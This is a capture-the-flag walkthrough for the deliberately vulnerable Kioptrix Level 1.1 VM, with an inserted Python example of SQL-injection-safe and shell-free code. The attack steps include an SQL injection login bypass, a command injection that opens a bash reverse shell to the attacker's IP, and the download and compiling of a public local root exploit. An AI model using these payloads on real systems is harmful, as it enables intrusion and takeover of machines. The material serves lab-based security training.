Vulnhub Series : 02

Kioptrix: Level 1.1 (#2) Walkthrough (Vulnhub | OSCP Model)

Kioptrix: Level 1.1 (#2) Walkthrough Summary (Vulnhub| OSCP Model)

Twitter: https://twitter.com/AppSecJay
LinkedIn: https://www.linkedin.com/in/jaganboda/

These Kioptrix VM images are easy challenges. The object of the game is to acquire root access via any means possible (except actually hacking the VM server or player). The purpose of these games is to learn the basic tools and techniques in vulnerability assessment and exploitation. There is more than one way to successfully complete the challenges.

Step by Step process:

Target Machine VM’s IP:
Step 1: I start by finding the IP address of the target Kioptrix 2 machine, using the command below.

netdiscover -r 192.168.0.0/24

Enumeration:

Step 2: Run an Nmap scan to find out which services are running.
nmap -Pn -A -v 192.168.48.156

Step 3: Look for directories and interesting files with the commands below.
dirb http://192.168.48.156
nikto -h http://192.168.48.156

Step 4: Explore the application for vulnerabilities.
Try default or most common credentials, such as admin:admin.

Gaining Access (Exploitation):

Step 5: Perform SQL injection to log in to the website, then perform command injection to upload the Bash reverse shell payload and execute it.

SQL Injection:
payload: 'or'1'='1

Command Injection:
ping 8.8.8.8; bash -i >& /dev/tcp/192.168.48.155/443 0>&1
Note: Change the IP address and port according to your lab setup.

Start a netcat listener: nc -lvp 443

Useful payload link: http://pentestmonkey.net/cheat-sheet/shells/reverse-shell-cheat-sheet
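
Added example (not from the original walkthrough and not the Kioptrix application's code): the two flaws used in Step 5, seen from the fixing side in Python. The table, function names and sample password are constructed for illustration; it puts a string-built login query next to a parameterized one, and adds a ping helper that accepts only a literal IP address and runs without a shell.

```python
import ipaddress
import sqlite3
import subprocess

# Constructed sample data: a throwaway in-memory user table (plaintext
# password only to keep the demo short; real code stores a salted hash).
db = sqlite3.connect(":memory:")
db.execute("CREATE TABLE users (username TEXT, password TEXT)")
db.execute("INSERT INTO users VALUES ('admin', 's3cret-constructed')")


def login_vulnerable(username, password):
    # Input is pasted into the SQL text, so a quote in the password
    # rewrites the WHERE clause itself.
    query = ("SELECT 1 FROM users WHERE username = '%s' AND password = '%s'"
             % (username, password))
    return db.execute(query).fetchone() is not None


def login_hardened(username, password):
    # Placeholders keep the input as data; quotes are never parsed as SQL.
    query = "SELECT 1 FROM users WHERE username = ? AND password = ?"
    return db.execute(query, (username, password)).fetchone() is not None


def build_ping_argv(host):
    # Accept only a literal IP address; anything else (';', spaces,
    # redirections) raises ValueError before any process is started.
    addr = ipaddress.ip_address(host.strip())
    return ["ping", "-c", "3", str(addr)]


def ping_hardened(host):
    # argv list, no shell: the address is a single argument and shell
    # metacharacters have no special meaning.
    result = subprocess.run(build_ping_argv(host), capture_output=True,
                            text=True, timeout=15)
    return result.stdout
```
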

Privilege Escalation:

Step 6: Get the reverse shell. Upload the shell code:
https://www.exploit-db.com/download/9542
sudo python -m SimpleHTTPServer 8086

Step 7: Download the shell code from the attacker machine (Kali Linux), then compile and execute it.
gcc 9542.c
./a.out

Boom.. Got root Shell

Clean up:
Just restart the victim machine to clean up.

It's quite easy and straightforward!

DISCLAIMER: Kioptrix is not responsible for any damage or instability
caused by running, installing or using this VM image.
Use at your own risk.

WARNING: This is a vulnerable system, DO NOT run this OS in a production
environment. Nor should you give this system access to the outside world
(the Internet – or Interwebs..)

Good luck and have fun!
